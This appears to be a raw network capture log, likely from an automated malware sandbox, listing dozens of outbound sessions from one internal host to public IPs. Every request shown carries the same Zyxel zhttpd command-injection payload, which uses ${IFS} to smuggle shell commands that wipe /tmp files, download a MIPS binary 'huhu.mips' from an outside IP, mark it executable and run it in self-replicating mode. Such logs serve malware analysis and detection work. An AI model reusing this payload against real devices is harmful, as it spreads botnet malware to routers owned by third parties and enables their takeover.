                                                Jan 29, 2024 07:07:48.345257998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4358192.168.2.2348566142.84.127.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.345288038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4359192.168.2.2360308101.149.125.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.345308065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4360192.168.2.233930070.251.121.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.345339060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4361192.168.2.233951640.147.208.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.345386982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4362192.168.2.234602448.57.10.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.345417976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4363192.168.2.2341632155.197.6.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.345448971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4364192.168.2.2339242222.1.228.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.345515013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4365192.168.2.2336174207.138.130.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.345551014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4366192.168.2.2352374121.106.106.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.345580101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4367192.168.2.233293099.148.58.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.345639944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4368192.168.2.2347806122.176.225.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.345639944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4369192.168.2.2359806110.199.112.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.345705032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4370192.168.2.2333822207.89.238.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.345726967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4371192.168.2.2360062135.71.250.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.345808983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4372192.168.2.233343435.219.168.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.345833063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4373192.168.2.2340466149.57.238.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.345868111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4374192.168.2.2359544125.197.170.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.345904112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4375192.168.2.234733695.114.45.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346005917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4376192.168.2.2352026112.188.190.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346010923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4377192.168.2.23370008.71.157.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346066952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4378192.168.2.2340472135.228.190.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346085072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4379192.168.2.234868661.55.134.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346127033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4380192.168.2.233828214.178.135.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346170902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4381192.168.2.2337444160.207.194.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346210003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4382192.168.2.235867261.109.80.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346234083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4383192.168.2.2336032216.234.141.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346273899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4384192.168.2.235672472.54.217.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346324921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4385192.168.2.2333520105.129.25.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346349955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4386192.168.2.2351090163.131.1.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346373081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4387192.168.2.235828277.55.225.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346434116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4388192.168.2.2360146131.3.248.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346470118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4389192.168.2.2341410156.175.51.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346513987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4390192.168.2.2335078174.233.4.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346558094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4391192.168.2.2346084108.70.172.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346601963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4392192.168.2.235031827.119.48.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346642971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4393192.168.2.2338426112.73.25.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346668959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4394192.168.2.2351360187.95.3.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346713066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4395192.168.2.2352282158.35.121.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346749067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4396192.168.2.2344220135.54.240.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346784115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4397192.168.2.2358890195.86.188.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346823931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4398192.168.2.233840818.123.66.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346868038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4399192.168.2.2347490123.185.141.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346898079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4400192.168.2.2347452126.9.84.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346946955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4401192.168.2.233728298.45.169.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.346987009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4402192.168.2.2334614115.5.222.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.347027063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4403192.168.2.2344506178.249.103.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.347071886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4404192.168.2.2346436165.183.123.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.347096920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4405192.168.2.2351294126.227.173.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.347138882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4406192.168.2.2359274201.200.146.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.347192049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4407192.168.2.235817665.118.77.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.347237110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4408192.168.2.234557238.190.70.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.347266912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4409192.168.2.2355212112.94.161.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.347300053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4410192.168.2.2332966167.236.36.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.347359896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4411192.168.2.2347398211.134.171.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.347388983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4412192.168.2.2357062132.248.16.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.347436905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4413192.168.2.2358210186.220.18.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.347464085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4414192.168.2.2346360194.52.166.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.347513914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4415192.168.2.2344286114.103.146.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.347552061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4416192.168.2.234672450.223.8.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.347573996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4417192.168.2.235315438.24.160.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.347614050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4418192.168.2.234626899.27.230.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.347677946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4419192.168.2.2341942189.135.166.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.347681046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4420192.168.2.233486497.85.17.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.347713947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4421192.168.2.235350659.98.218.217443
                                                TimestampBytes transferredDirectionData
